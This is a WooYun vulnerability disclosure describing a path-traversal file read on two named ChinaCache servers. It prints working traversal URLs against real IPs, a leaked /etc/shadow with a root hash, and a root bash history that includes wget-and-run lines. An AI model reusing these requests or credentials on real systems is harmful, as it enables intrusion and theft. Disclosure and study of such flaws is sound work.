当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110640

漏洞标题:ChinaCache某两台服务器任意文件读取

相关厂商:ChinaCache

漏洞作者: 路人甲

提交时间:2015-04-27 14:00

修复时间:2015-06-11 14:22

公开时间:2015-06-11 14:22

漏洞类型:重要敏感信息泄露

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-27: 细节已通知厂商并且等待厂商处理中
2015-04-27: 厂商已经确认,细节仅向厂商公开
2015-05-07: 细节向核心白帽子及相关领域专家公开
2015-05-17: 细节向普通白帽子公开
2015-05-27: 细节向实习白帽子公开
2015-06-11: 细节向公众公开

简要描述:

任意文件读取

详细说明:

需要使用一些请求工具,直接浏览器访问不可以
http://42.62.25.197/../../../../../../../../../../../../../../../../../etc/hosts
http://42.62.25.196/../../../../../../../../../../../../../../../../../etc/hosts

捕获.PNG


root权限:
http://42.62.25.197/../../../../../../../../../../../../../../../../../etc/shadow

root:$1$WdIfTFIg$2ZvTRs6FKd7c8lZU0g5Bt/:16341:0:99999:7:::
bin:*:16315:0:99999:7:::
daemon:*:16315:0:99999:7:::
adm:*:16315:0:99999:7:::
lp:*:16315:0:99999:7:::
sync:*:16315:0:99999:7:::
shutdown:*:16315:0:99999:7:::
halt:*:16315:0:99999:7:::
mail:*:16315:0:99999:7:::
news:*:16315:0:99999:7:::
uucp:*:16315:0:99999:7:::
operator:*:16315:0:99999:7:::
games:*:16315:0:99999:7:::
gopher:*:16315:0:99999:7:::
ftp:*:16315:0:99999:7:::
nobody:*:16315:0:99999:7:::
nscd:!!:16315:0:99999:7:::
ais:!!:16315:0:99999:7:::
distcache:!!:16315:0:99999:7:::
vcsa:!!:16315:0:99999:7:::
ntp:!!:16315:0:99999:7:::
mysql:!!:16315:0:99999:7:::
pcap:!!:16315:0:99999:7:::
dbus:!!:16315:0:99999:7:::
cimsrvr:!!:16315:0:99999:7:::
hsqldb:!!:16315:0:99999:7:::
oprofile:!!:16315:0:99999:7:::
squid:!!:16315:0:99999:7:::
haldaemon:!!:16315:0:99999:7:::
avahi:!!:16315:0:99999:7:::
apache:!!:16315:0:99999:7:::
mailnull:!!:16315:0:99999:7:::
smmsp:!!:16315:0:99999:7:::
xfs:!!:16315:0:99999:7:::
rpc:!!:16315:0:99999:7:::
named:!!:16315:0:99999:7:::
postgres:!!:16315:0:99999:7:::
piranha:!!:16315:0:99999:7:::
sshd:!!:16315:0:99999:7:::
gdm:!!:16315:0:99999:7:::
webalizer:!!:16315:0:99999:7:::
dovecot:!!:16315:0:99999:7:::
luci:!!:16315:0:99999:7:::
tomcat:!!:16315:0:99999:7:::
rpcuser:!!:16315:0:99999:7:::
nfsnobody:!!:16315:0:99999:7:::
avahi-autoipd:!!:16315:0:99999:7:::
sabayon:!!:16315:0:99999:7:::
qemu:!!:16315:0:99999:7:::
ricci:!!:16315:0:99999:7:::
puppet:!!:16426::::::
sonar:!!:16471::::::


可以查看.bash_history
http://42.62.25.196/../../../../../../../../../../../../../../../../../root/.bash_history

cd /usr/local/nginx/conf/
#1414028560
ls
#1414028563
cat nginx.conf
#1414028574
vim nginx.conf
#1414028598
ls
#1414028601
vim nginx.conf
#1414028670
/etc/init.d/nginx.sh restart
#1414028676
netstat -ltunp
#1414028708
ls
#1414028771
ls
#1414028774
ls
#1414028777
cat nginx.conf
#1414028997
ls
#1414029009
cd /data/cache1
#1414029010
ls
#1414029022
cd hls3.gzstv.com/
#1414029023
ls
#1414030010
cd /data/cache1
#1414030011
ls
#1414030014
cd hls3.gzstv.com/
#1414030014
LS
#1414030016
LS
#1414030018
ls
#1414030021
cd live
#1414030021
ls
#1414030023
cd cc
#1414030024
ls
#1414030028
ls -trl
#1414030034
ls -trl
#1414030035
ls -trl
#1414030036
ls -trl
#1414030037
ls -trl
#1414030038
ls -trl
#1414030039
ls -trl
#1414030040
ls -trl
#1414030041
ls -trl
#1414030041
ls -trl
#1414030042
ls -trl
#1414030046
ls -trl
#1414030047
ls -trl
#1414030052
ls -trl
#1414030054
ls -trl
#1414030055
ls -trl
#1414030056
ls -trl
#1414030056
ls -trl
#1414030058
ls -trl
#1414030072
ls -trl
#1414030073
ls -trl
#1414030074
ls -trl
#1414034752
netstat -ltunp
#1414046455
netstat -ntlp
#1414046462
vim /usr/local/ccms/origin/etc/ccms_origin.conf
#1414042554
ifconfig
#1414042587
cd /usr/local/ccms/origin/etc/
#1414042588
ls
#1414042591
cat ccms_edge.conf 
#1414042604
ls
#1414042608
cat ccms_origin.conf
#1414044732
netstat -ltunp
#1414044880
netstat -ltunp
#1414044884
ifconfig
#1414119785
cd /usr/local/ccms/origin
#1414119785
ls
#1414119787
cd logs
#1414119788
ls
#1414119805
tail -f 20141021090639-Orginlog.log
#1414120950
cat 20141021090639-Orginlog.log | grep -a tcUrl=rtmp://pull.showself.com/
#1414120998
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://pull.showself.com/
#1414121330
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://pull.showself.com/ | awk 'BEGIN{FS=" "} {if($1=="10") print $2}'
#1414121347
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://pull.showself.com/ | awk 'BEGIN{FS=" "} {if($1=="[10-24") print $2}'
#1414121398
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://pull.showself.com/ | awk 'BEGIN{FS=" "} {if($1=="[10-24") print $6}'
#1414121427
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://pull.showself.com/ | awk 'BEGIN{FS=" "} {if($1=="[10-24") print $6}'
#1414121429
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://pull.showself.com/
#1414121528
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://pull.showself.com/ | awk 'BEGIN{FS=" "} {if($1=="[10-24") print}' 
#1414121615
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://pull.showself.com/ | awk 'BEGIN{FS=" "} {if($1=="[10-24") print}' 
#1414121683
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://pull.showself.com/ | awk 'BEGIN{FS=" "} {if($1=="[10-24") print NF}' 
#1414121808
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://pull.showself.com/ | awk 'BEGIN{FS=" "} {if($1=="[10-24") print $5}' 
#1414121838
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://pull.showself.com/ | awk 'BEGIN{FS=" "} {if($1=="[10-24") print $7}' 
#1414121858
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://pull.showself.com/ | awk 'BEGIN{FS=" "} {if($1=="[10-24") print $NF}
#1414121878
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://pull.showself.com/ | awk 'BEGIN{FS=" "} {if($1=="[10-24") print}' 
#1414121952
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://pull.showself.com/ | awk 'BEGIN{FS=" "} {if($1=="[10-24") if($NF=="stream_name*") print $NF}' 
#1414121961
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://pull.showself.com/ | awk 'BEGIN{FS=" "} {if($1=="[10-24") if($NF=='stream_name*') print $NF}' 
#1414121981
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://pull.showself.com/ | awk 'BEGIN{FS=" "} {if($1=="[10-24") print $NF}' 
#1414122013
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://pull.showself.com/ | awk 'BEGIN{FS=" "} {if($1=="[10-24") print $NF}' | grep "stream*" 
#1414122188
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://pull.showself.com/ | awk 'BEGIN{FS=" "} {if($1=="[10-24") print $NF}' | grep "stream*" 
#1414122203
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://pull.showself.com/ | awk 'BEGIN{FS=" "} {if($1=="[10-24") print $NF}' | grep "stream*" 
#1414122215
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://pull.showself.com/ | awk 'BEGIN{FS=" "} {if($1=="[10-24") print $NF}' | grep "stream*" 
#1414122220
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://pull.showself.com/ | awk 'BEGIN{FS=" "} {if($1=="[10-24") print $NF}' | grep "stream*" 
#1414119244
ls
#1414119303
cd /usr/local/ccms/origin
#1414119309
ls
#1414119312
cat etc
#1414119313
ls
#1414119325
cat ccms-origin 
#1414119334
cd etc
#1414119334
ls
#1414119339
cat ccms_origin.conf
#1414119355
ls
#1414119358
cd ..
#1414119359
ls
#1414119362
cd logs
#1414119363
ls
#1414119378
tail -f 20141021090639-Orginlog.log
#1414119384
ls
#1414119407
find / -name "log"
#1414119431
find / -name "logs"
#1414119466
pwd
#1414119469
ls
#1414119472
ls -trl
#1414119488
tail -f 20141021090639-Orginlog.log
#1414119713
ls 
#1414120139
cd /usr/local/ccms/origin/
#1414120140
ls
#1414120141
cd logs
#1414120141
ls
#1414120146
ls -hlr
#1414120148
ls
#1414120170
cat 20141021090639-Orginlog.log | grep tcUrl=rtmp://pull.showself.com/
#1414123647
ls
#1414123660
cd /usr/lcoal/ccms
#1414123665
cd /usr/lcoal/ccms
#1414123678
cd /usr/local/ccms/origin/etc
#1414123679
ls
#1414123684
cat ccms_origin.conf
#1414123696
cd data
#1414123698
cd data
#1414123703
cd /
#1414123703
ls
#1414123707
cd data
#1414123707
ls
#1414123711
cd cache1
#1414123712
ls
#1414123728
lll
#1414123729
l
#1414123731
ll
#1414123883
cd /usr/local/ccms/origin
#1414123883
ls
#1414123885
cd etc
#1414123886
ls
#1414123891
vim ccms_origin.conf
#1414123917
/etc/init.d/ccms-origin reload
#1414124073
vim ccms_origin.conf
#1414124093
/etc/init.d/ccms-origin reload
#1414124140
ls
#1414124143
netstat -ltunp
#1414373093
cd /usr/local/ccms/origin
#1414373094
ls
#1414373095
cd logs
#1414373096
ls
#1414373207
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://live3.gzstv.com | awk 'BEGIN{FS=" "} {if($1=="[10-27") print $NF}' | grep "stream*"  
#1414373216
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://live3.gzstv.com | awk 'BEGIN{FS=" "} { print $NF}' | grep "stream*"  
#1414373226
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://live3.gzstv.com
#1414373229
ll
#1414373237
ls -h
#1414373239
ls -hl
#1414373261
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://live3*
#1414373462
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://live3.*
#1414373483
head 10 20141021090639-Orginlog.log
#1414374216
cd /usr/local/ccms/origin
#1414374217
ls
#1414374219
cd logs
#1414374220
ls
#1414374222
ll -hltr
#1414374281
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://live3.gzstv.com | awk 'BEGIN{FS=" "} {if($1=="[10-27") print $NF}' | grep "stream*"  
#1414374295
tail -f 20141021090639-Orginlog.log
#1414374639
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://wmup.ccgslb.com.cn | awk 'BEGIN{FS=" "} {if($1=="[10-27") print $NF}' | grep "stream*"  
#1414374650
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://wmup.ccgslb.com.cn* | awk 'BEGIN{FS=" "} {if($1=="[10-27") print $NF}' | grep "stream*"  
#1414374654
ll
#1414374770
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://wmup.ccgslb.com.cn 
#1414374792
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://wmdown.ccgslb.com.cn | awk 'BEGIN{FS=" "} {if($1=="[10-27") print $NF}' | grep "stream*"  
#1414374819
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://wmdown.ccgslb.com.cn | awk 'BEGIN{FS=" "} {if($1=="[10-27") print $NF}' | grep "stream*"  
#1414374840
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://wmdown.ccgslb.com.cn | awk 'BEGIN{FS=" "} {if($1=="[10-27") print $NF}' | grep "stream*"  
#1414374843
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://wmdown.ccgslb.com.cn | awk 'BEGIN{FS=" "} {if($1=="[10-27") print $NF}' | grep "stream*"  
#1414374844
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://wmdown.ccgslb.com.cn | awk 'BEGIN{FS=" "} {if($1=="[10-27") print $NF}' | grep "stream*"  
#1414375183
cd /usr/local/ccms/origin
#1414375183
ls
#1414375185
cd logs
#1414375185
ls
#1414375197
tail -f 20141021090639-Orginlog.log
#1414375341
tail -f 20141021090639-Orginlog.log
#1414375485
ll
#1414375489
cat 20141021090639-Orginlog.log | grep -A5 tcUrl=rtmp://pull.showself.com/ | awk 'BEGIN{FS=" "} {if($1=="[10-27") print $NF}' | grep "stream*"  
#1414378123
ls
#1414378132
vim /usr/local/ccms/origin/etc/ccms_origin.conf
#1414378325
cat  /usr/local/ccms/origin/etc/ccms_origin.conf | grep vhost
#1414378339
cat  /usr/local/ccms/origin/etc/ccms_origin.conf | grep vhost | awk '{print $2}'
#1414378349
cat  /usr/local/ccms/origin/etc/ccms_origin.conf | grep vhost | awk '{print $2}'
#1414385102
/etc/init.d/ccms-origin reload
#1414385152
cd /usr/local/ccms/origin
#1414385153
ls
#1414385158
cd ccms-origin 
#1414385161
cd etc
#1414385162
ls
#1414385170
cat ccms_origin.conf
#1414385188
vim ccms_origin.conf
#1414385224
/etc/init.d/ccms-origin reload
#1414385697
cat /usr/local/ccms/origin/etc
#1414385702
cat /usr/local/ccms/origin/etc/ccms_origin.conf
#1414396638
cd /usr/local/ccms/origin
#1414396638
ls
#1414396640
cd et
#1414396643
cd etc
#1414396645
ls
#1414396649
cat ccms_origin.conf
#1414396661
vim ccms_origin.conf
#1414396711
/etc/init.d/ccms-origin reload
#1414396719
vim ccms_origin.conf
#1414396723
ls
#1414406704
cd /data/cache1
#1414406705
ls
#1414406708
cd hls3.gzstv.com/
#1414406708
ls
#1414406710
cd txh
#1414406711
ls
#1414406712
cd cc
#1414406712
ls
#1414406713
ls
#1414406714
ls
#1414406724
ls
#1414406726
ls
#1414401342
vim /usr/local/ccms/origin/etc/ccms_origin.conf
#1414401415
netstat -lntp
#1414401481
vim /usr/local/ccms/origin/etc/ccms_origin.conf
#1414401534
netstat -lntp
#1414401530
netstat -ltunp
#1414401543
cd /usr/local/nginx/
#1414401543
ls
#1414401550
cd conf
#1414401551
ls
#1414401554
cat nginx.conf
#1414401689
vim nginx.conf
#1414401711
/etc/init.d/nginx.sh reload
#1414402469
netstat -ltunp
#1414402717
cd /usr/local/ccms/origin
#1414402718
ls
#1414402719
cd etc
#1414402720
ls
#1414402723
cat ccms_origin.conf
#1414402740
ifconfig
#1414404517
cd /usr/local/ccms/origin
#1414404518
ls
#1414404519
cd etc
#1414404520
ls
#1414404525
cat ccms_origin.conf
#1414404553
cat /usr/local/nginx/conf/nginx.conf
#1414404792
vim /usr/local/nginx/conf/nginx.conf
#1414404813
/etc/init.d/nginx.sh reload
#1414404828
cd /usr/local/ccms/origin
#1414404829
ls
#1414404831
cd etc
#1414404832
ls
#1414404842
ls
#1414404846
cat ccms_origin.conf
#1414404864
netstat -ltunp
#1414405014
lsnetstat -ltunp
#1414405016
netstat -ltunp
#1414405197
ls
#1414405198
cd ..
#1414405199
ls
#1414405202
cd /data/
#1414405203
ls
#1414405208
cd cache1
#1414405208
ls
#1414405213
cd hls3.gzstv.com/
#1414405214
ls
#1414405216
cd txh
#1414405217
ls
#1414405219
cd cc
#1414405220
ls
#1414405223
ls -ltr
#1414405255
ls
#1414405257
ls 
#1414405337
ls
#1414405338
ls
#1414405340
cd ..
#1414405340
ls
#1414405345
netstat -ltunp
#1414405450
ls
#1414405465
cat /usr/local/nginx/conf/nginx.conf
#1414405482
/etc/init.d/nginx.sh restart
#1414405490
netstat -ltunp
#1414405682
ls
#1414405684
cd cc
#1414405685
ls
#1414405688
cd txh1
#1414405689
ls
#1414405691
cd ..
#1414405692
ls
#1414405694
cd txh1/
#1414405695
ls
#1414405695
ls
#1414405712
ls
#1414405713
cd ..
#1414405714
ls
#1414405716
cd cc
#1414405717
ls
#1414405930
netstat -ltunp
#1414405940
ls
#1414405944
ls
#1414405945
cd ..
#1414405945
ls
#1414405946
pwd
#1414405949
cd txh
#1414405949
ls
#1414405952
ls
#1414405953
cd cc
#1414405953
ls
#1414405954
pwd
#1414405978
cat /usr/local/nginx/etc
#1414405987
cat /usr/local/nginx/conf/nginx.conf
#1414405999
cd /data/cache1
#1414406000
ls
#1414406004
cd hls3.gzstv.com/
#1414406004
ls
#1414406007
cd ..
#1414406009
ll
#1414406029
chmod 777 hls3.gzstv.com/
#1414406032
chmod 777 hls3.gzstv.com/
#1414406033
ls
#1414406035
ll
#1414406038
cd hls
#1414406041
cd hls3.gzstv.com/
#1414406041
ls
#1414406045
cd txh
#1414406045
ls
#1414406047
cd cc
#1414406047
ls
#1414406048
ls
#1414406048
ls
#1414406049
ls
#1414406293
ls
#1414406294
ls
#1414406296
cd ..
#1414406297
ls
#1414406298
cd txh1
#1414406299
ls
#1414406299
ls
#1414406301
cd ..
#1414406301
ls
#1414406302
ls
#1414406303
cd cc
#1414406303
ls
#1414406304
sls
#1414406305
ls
#1414405822
netstat -lntp
#1414405830
vim /usr/local/ccms/origin/etc/ccms_origin.conf
#1414406019
cd /data/cache1
#1414406020
ls
#1414406026
cd hls3.gzstv.com/
#1414406027
ls
#1414406030
cd txh/
#1414406030
ls
#1414406032
cd cc/
#1414406032
ls
#1414406048
vim /usr/local/ccms/origin/etc/ccms_origin.conf
#1414406201
vim /usr/local/ccms/origin/etc/ccms_origin.conf
#1414406212
/etc/init.d/ccms-origin reload
#1414406221
netstat -lntp
#1414406223
ls
#1414406227
cat index.m3u8.list 
#1414406227
ls
#1414406229
ls
#1414406230
cat index.m3u8.list 
#1414406231
cat index.m3u8.list 
#1414406231
cat index.m3u8.list 
#1414406232
cat index.m3u8.list 
#1414406233
cd ..
#1414406233
ls
#1414406235
cd txh1/
#1414406236
ls
#1414406237
cd ..
#1414406238
ls
#1414406241
cd ..
#1414406241
ls
#1414406243
cd ..
#1414406244
ls
#1414406253
vim /usr/local/ccms/origin/etc/ccms_origin.conf
#1414406356
netstat -lntp
#1414406360
vim /usr/local/ccms/origin/etc/ccms_origin.conf
#1414406375
netstat -lntp
#1414406402
vim /usr/local/nginx/conf/nginx.conf
#1414406445
cd
#1414406445
ls
#1414406448
cd /data/cache1
#1414406448
ls
#1414406452
cd hls3.gzstv.com/
#1414406453
ls
#1414406455
cd txh/
#1414406455
ls
#1414406456
cd cc/
#1414406457
ls
#1414406469
cd ..
#1414406470
ls
#1414406471
cd ..
#1414406471
ls
#1414406473
cd ..
#1414406474
ls
#1414406477
cd hls3.gzstv.com/
#1414406478
ls
#1414406487
cd txh/
#1414406488
ls
#1414406489
cd cc/
#1414406490
ls
#1414406496
/etc/init.d/ccms-origin restart
#1414406500
netstat -lntp
#1414406529
netstat -lntp
#1414406536
ls
#1414406538
ls
#1414406539
ls
#1414406539
ls
#1414406540
ls
#1414406541
cd ..
#1414406541
ls
#1414406542
ls
#1414406542
ls
#1414406543
ls
#1414406544
cd cc/
#1414406544
ls
#1414406547
cat index.m3u8.list 
#1414406549
cat index.m3u8.list 
#1414406549
cat index.m3u8.list 
#1414406550
cat index.m3u8.list 
#1414406550
cat index.m3u8.list 
#1414406550
cat index.m3u8.list 
#1414406551
cat index.m3u8.list 
#1414406551
cat index.m3u8.list 
#1414406551
cat index.m3u8.list 
#1414406552
cat index.m3u8.list 
#1414406552
cat index.m3u8.list 
#1414406552
cat index.m3u8.list 
#1414406553
cat index.m3u8.list 
#1414406553
cat index.m3u8.list 
#1414406553
cat index.m3u8.list 
#1414406554
cat index.m3u8.list 
#1414406554
cat index.m3u8.list 
#1414406555
cat index.m3u8.list 
#1414406555
cat index.m3u8.list 
#1414406555
cat index.m3u8.list 
#1414406555
cat index.m3u8.list 
#1414406555
cat index.m3u8.list 
#1414406556
cat index.m3u8.list 
#1414406556
cat index.m3u8.list 
#1414406557
cat index.m3u8.list 
#1414406558
cd ..
#1414406559
ls
#1414406560
cd ..
#1414406560
ls
#1414406582
vim /usr/local/ccms/origin/etc/ccms_origin.conf
#1414406607
/etc/init.d/ccms-origin reload
#1414406615
netstat -lntp
#1414406617
ls
#1414406618
ls
#1414406618
ls
#1414406619
cd txh/
#1414406619
ls
#1414406622
cd cc/
#1414406622
ls
#1414406623
ls
#1414406623
ls
#1414406625
cat index.m3u8.list 
#1414406626
cat index.m3u8.list 
#1414406627
cat index.m3u8.list 
#1414406627
cat index.m3u8.list 
#1414406627
cat index.m3u8.list 
#1414406627
cat index.m3u8.list 
#1414406627
cat index.m3u8.list 
#1414406628
cat index.m3u8.list 
#1414406628
cat index.m3u8.list 
#1414406628
cat index.m3u8.list 
#1414406629
cat index.m3u8.list 
#1414464057
cd /usr/local/ccms/origin
#1414464057
ls
#1414464059
cd logs
#1414464060
ls
#1414464085
tail -f 20141027184137-Orginlog.log
#1414464998
cd /usr/local/ccms/origin
#1414464998
ls
#1414465000
cd logs
#1414465000
l
#1414465001
ls
#1414465099
cat 20141027184137-Orginlog.log | grep -A5 tcUrl=rtmp://pull.showself.com/ | awk 'BEGIN{FS=" "} {if($1=="[10-28") print $NF}' | grep "stream*"  
#1414465120
cat 20141027184137-Orginlog.log | grep -A5 tcUrl=rtmp://pull.showself.com/
#1414465339
ls
#1414546862
cd /usr/local/ccms/origin/etc
#1414546863
ls
#1414546866
cat ccms_origin.conf
#1414557734
cat /etc/hosts
#1414557772
ifconfig
#1414579625
cd /usr/local/ccms/origin/etc
#1414579627
cd ..
#1414579628
ls
#1414579630
cd logs
#1414579630
ls
#1414579633
ls -ltr
#1414579642
tail -f 20141027184137-Orginlog.log
#1414652221
netstat -lntp
#1414652221
w
#1415157371
netstat -lntp
#1415157376
cd /usr/local/cm
#1415157381
cd /usr/local/ccms
#1415157381
ls
#1415157383
cd origin
#1415157383
ls
#1415157385
cd etc/
#1415157385
ls
#1415157388
vim ccms_origin.conf
#1415157400
/etc/init.d/ccms-origin version
#1415157409
vim ccms_origin.conf
#1415157454
/etc/init.d/ccms-origin reload
#1415157482
cd ..
#1415157482
ls
#1415157483
cd logs/
#1415157484
ls
#1415157485
ls
#1415157487
ll
#1415157493
cat  20141104160906-Orginlog.log | grep test
#1417575447
cat /sn.txt 
#1417575457
netstat -ntlp
#1417575460
df -h
#1417575462
netstat -tnlp
#1417575498
vim /usr/local/ccms/origin/etc/ccms_origin.conf
#1417575509
ls
#1417575511
netstat -tnlp
#1419399421
vim /usr/local/ccms/origin/etc/ccms_origin.conf
#1426736414
ls
#1426736417
rm  -f ccms_origin_update.sh && wget http://58.68.234.194:800/rdb/ccms/test/ccms_origin_update.sh && bash ccms_origin_update.sh
#1426736475
yum -y install libmysqlclient.so.16
#1426736548
netstat -lntp
#1426736565
vim /usr/local/ccms/origin/etc/ccms_origin.conf
#1426736585
vim /usr/local/ccms/origin/etc/ccms_origin.conf
#1426736605
vim /usr/local/ccms/origin/etc/ccms_origin.conf
#1426736678
vim /usr/local/ccms/origin/etc/ccms_origin.conf
#1426736758
/etc/init.d/ccms-origin restart
#1426736761
netstat -lntp
#1426736774
vim /usr/local/nginx/conf/nginx.conf
#1426736790
cd /data/cache3
#1426736791
ls
#1426736796
mkdir                listen  80 ;
#1426736796
                server_name hls3.gzstv.com;
#1426736796
                root   /data/cache1/hls3.gzstv.com ;
#1426736810
vim /usr/local/ccms/origin/etc/ccms_origin.conf
#1426736824
mkdir t.59find.com
#1426736829
df -h
#1426736833
ls
#1426736838
mkdir t.59find.com
#1426736843
cd /data/cache1
#1426736843
ls
#1426736845
mkdir t.59find.com
#1426736855
vim /usr/local/ccms/origin/etc/ccms_origin.conf
#1426736875
/etc/init.d/ccms-origin restart
#1426735138
netstat -lntp
#1426735146
vim /usr/local/ccms/origin/etc/ccms_origin.conf
#1426735166
/etc/init.d/ccms-origin version
#1426737366
ifconfig
#1426737385
/etc/init.d/ccms-origin version
#1426737436
ls
#1426737443
cd ccms-origin-1.3.4.5-centos-5-Linux-2.6.18-x86_64
#1426737443
ls
#1426737465
cd /etc/init.d/
#1426737466
ls
#1426737472
./ccms-origin version
#1426737473
./ccms-origin version
#1426737474
./ccms-origin version
#1426737474
./ccms-origin version
#1426737475
cd
#1426737483
rm ccms_origin_update.sh && wget http://58.68.234.194:800/rdb/ccms/test/ccms_origin_update.sh && bash ccms_origin_update.sh
#1426737526
/etc/init.d/ccms-origin version
#1426737545
ls
#1426737563
cd ccms-origin-1.3.4.5-centos-5-Linux-2.6.18-x86_64
#1426737564
ls
#1426737572
./origin_install.sh 
#1426737601
./origin_install_manual.sh 
#1426737766
cd /usr/local/ccms/origin
#1426737766
ls
#1426737779
cd /usr/local/ccms
#1426737780
ls
#1426737794
ll
#1426737827
ls
#1426737835
rm  -f  origin
#1426737836
ls
#1426737853
cd 
#1426737853
ls
#1426737860
cd ccms-origin-1.3.4.5-centos-5-Linux-2.6.18-x86_64
#1426737861
ls
#1426737872
./origin_install_manual.sh 
#1426737895
ls
#1426738090
cd  /usr/local/ccms/
#1426738091
ls
#1426738100
cd origin.1426736431
#1426738100
ls
#1426738103
cd etc/
#1426738103
ls
#1426738107
vim ccms_origin.conf
#1426738157
mv /usr/local/ccms/origin/etc/ccms_origin.conf /usr/local/ccms/origin/etc/ccms_origin.conf.bak
#1426738173
cp ./ccms_origin.conf /usr/local/ccms/origin/etc/ccms_origin.conf
#1426738183
cd /usr/local/ccms/origin/etc
#1426738183
ls
#1426738186
vim ccms_origin.conf
#1426738191
/etc/init.d/ccms-origin restart
#1426738202
yum -y install  libmysqlclient.so.16
#1426738212
/etc/init.d/ccms-origin version
#1426738265
netstat -lntp
#1426738270
/etc/init.d/ccms-origin version
#1426738285
netsta -lntp
#1426738291
netstat -lntp
#1426738309
vim /etc/init.d/ccms-origin 
#1426738337
/etc/init.d/ccms-origin restat
#1426738340
/etc/init.d/ccms-origin restart
#1426738399
cd
#1426738399
ls
#1426738403
cd ccms-origin-1.3.4.5-centos-5-Linux-2.6.18-x86_64
#1426738404
ls
#1426738413
./mysql_install_manual.sh 
#1426738428
cd /usr/local/
#1426738428
ls
#1426738432
rm -rf mysql/
#1426738437
./mysql_install_manual.sh 
#1426738444
cd -
#1426738444
ls
#1426738448
./mysql_install_manual.sh 
#1426738453
cd
#1426738458
/etc/init.d/ccms-origin restart
#1426738499
rm  -f ccms_origin_update.sh && wget http://58.68.234.194:800/rdb/ccms/test/ccms_origin_update.sh && bash ccms_origin_update.sh
#1426738514
/etc/init.d/ccms-origin version
#1426741790
vim /etc/resolv.conf 
#1426741804
rm  -f ccms_origin_update.sh && wget http://58.68.234.194:800/rdb/ccms/test/ccms_origin_update.sh && bash ccms_origin_update.sh
#1426741825
yum -y install libmysqlclient.so.16
#1426741993
ls
#1426741995
netstat -lntp
#1426742005
vim /usr/local/ccms/origin/etc/ccms_origin.conf
#1426742034
ifconfig
#1426745034
exit
#1426743117
crontab -e
#1426743168
ls -lh
#1426743172
cd /usr/local/ccms/origin
#1426743173
ls -lh
#1426743174
cd bin
#1426743175
ls -lh
#1426743183
ldd ccms_ori 
#1426743219
ls -lh
#1426743230
./ccms_ori -v
#1426743295
cat /etc/issue
#1426744303
cd /usr/local/mysql/bin/
#1426744304
ls -lh
#1426744306
cd ..
#1426744307
ls -lh
#1426744308
cd lib
#1426744309
ls -lh
#1426744313
mysql
#1426744317
cd mysql/
#1426744319
ls -lh
#1426744344
cd ..
#1426744345
ls -lh
#1426744347
cd ..
#1426744348
ls -lh
#1426744351
cd ..
#1426744352
ls -lh
#1426744358
cd
#1426744360
ls -lh
#1426744374
cd ccms-origin-1.3.4.5-centos-5-Linux-2.6.18-x86_64
#1426744375
ls -lh
#1426744380
cd bin
#1426744381
ls -lh
#1426744386
ldd ccms_ori 
#1426744558
ls -lh /usr/local/mysql/lib/mysql/libmysqlclient.so.16
#1426744652
cd ..
#1426744707
ls -lh
#1426744715
rm -rf /usr/local/mysql/
#1426744726
./mysql_install_manual.sh 
#1426744795
cc
#1426744814
ps -ef|grep mysql
#1426744821
killall mysql
#1426744828
killall mysqld
#1426744833
ps -ef|grep mysql
#1426744845
ps -ef|grep mysql
#1426744850
ls -lh
#1426744858
./mysql_install_manual.sh 
#1426744873
rm -rf /usr/local/mysql
#1426744875
./mysql_install_manual.sh 
#1426744903
ps -ef|grep mysql
#1426744916
vi mysql_install_manual.sh 
#1426744928
ls -lh
#1426744938
rm -rf /usr/local/ccms/origin
#1426744943
./origin_install_manual.sh 
#1426744952
cd /usr/local/ccms/origin
#1426744954
ls -lh
#1426744957
cd bin
#1426744958
ls -lh
#1426744964
ldd ccms_ori 
#1426745076
crontab -e
#1426745142
useradd -m xiaosu.lv
#1426745152
passwd xiaosu.lv
#1426745174
ifconfig|less
#1426745216
killall mysqld
#1426745221
ps -ef|grep mysql
#1426745373
vi /etc/profile
#1426745455
ls -lh
#1426745463
ldd ccms_ori 
#1426745467
vi /etc/profile
#1426745520
vi /etc/ld.so.conf
#1426745531
ldconfig
#1426745539
ls -lh
#1426745542
ldd ccms_ori 
#1426745549
cd
#1426745561
cd /home/xiaosu.lv/
#1426745562
ls -lh
#1426745565
tar -xzvf test.tar.gz 
#1426745570
ls -lh
#1426745571
